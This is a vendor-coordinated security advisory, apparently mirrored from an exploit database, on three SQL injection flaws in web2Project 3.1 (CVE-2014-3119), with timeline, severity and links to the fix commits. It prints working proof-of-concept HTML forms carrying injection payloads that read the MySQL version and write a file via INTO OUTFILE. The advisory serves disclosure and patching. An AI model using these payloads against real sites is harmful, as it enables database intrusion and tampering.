web2Project 3.1 SQL Injection Vulnerability

2014-06-19T00:00:00
ID 1337DAY-ID-22346
Type zdt
Reporter High-Tech Bridge
Modified 2014-06-19T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            Product: web2Project 
Vendor: http://web2project.net
Vulnerable Version(s): 3.1 and probably prior
Tested Version: 3.1
Advisory Publication:  April 30, 2014  [without technical details]
Vendor Notification: April 30, 2014 
Vendor Patch: May 1, 2014 
Public Disclosure: June 18, 2014 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-3119
Risk Level: High 
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in web2Project, which can be exploited to perform SQL Injection attacks and gain complete access to vulnerable website.


1) SQL Injection in web2Project: CVE-2014-3119


1.1 The vulnerability exists due to insufficient sanitization of the "search_string" HTTP POST parameter passed to "/index.php" script. A remote authenticated user with privileges to access "contacts" module can inject and execute arbitrary SQL commands in application’s database and e.g. create, alter and delete information, or gain unauthorized access to vulnerable website. 

The following exploitation example displays version of the MySQL Server:


<form action="http://[host]/index.php?m=contacts" method="post" name="main">
<input type="hidden" name="search_string" value="'and(select 1 from(select count(*),concat((select version() from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'">
<input type="submit" id="btn">
</form>


1.2 The vulnerability exists due to insufficient sanitization of the "updatekey" HTTP POST parameter passed to "/do_updatecontact.php". This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. A remote unauthenticated attacker can inject and execute arbitrary SQL commands in application’s database and e.g. create, alter and delete information, or gain unauthorized access to vulnerable website.

The following exploitation example writes the word "immuniweb" into file "file.txt", depending on MySQL configuration and filesystem permissions:


<form action="http://[host]/do_updatecontact.php" method="post" name="main">
<input type="hidden" name="updatekey" value="' UNION SELECT 'immuniweb' INTO OUTFILE 'file.txt' -- ">
<input type="submit" id="btn">
</form>


1.3 The vulnerability exists due to insufficient sanitization of the "updatekey" HTTP GET parameter passed to "/updatecontact.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. A remote unauthenticated attacker can inject and execute arbitrary SQL commands in application’s database and e.g. create, alter and delete information, or gain unauthorized access to vulnerable website.

The following exploitation example writes the word "immuniweb" info file "file.txt", depending on MySQL configuration and filesystem permissions:


<form action="http://[host]/updatecontact.php" method="get" name="main">
<input type="hidden" name="updatekey" value="' UNION SELECT 'immuniweb' INTO OUTFILE 'file.txt' -- ">
<input type="submit" id="btn">
</form>


Successful exploitation of the vulnerabilities can grant an attacker unrestricted access to the website and its database.

-----------------------------------------------------------------------------------------------

Solution:

Apply vendor fixes:
https://github.com/web2project/web2project/commit/eead99b36f62a8222d9f3a913f1a2268200687ef
https://github.com/web2project/web2project/commit/ab5ba92a6aaf0435cd0b2132cf7f9b7b41575a28

#  0day.today [2018-04-04]  #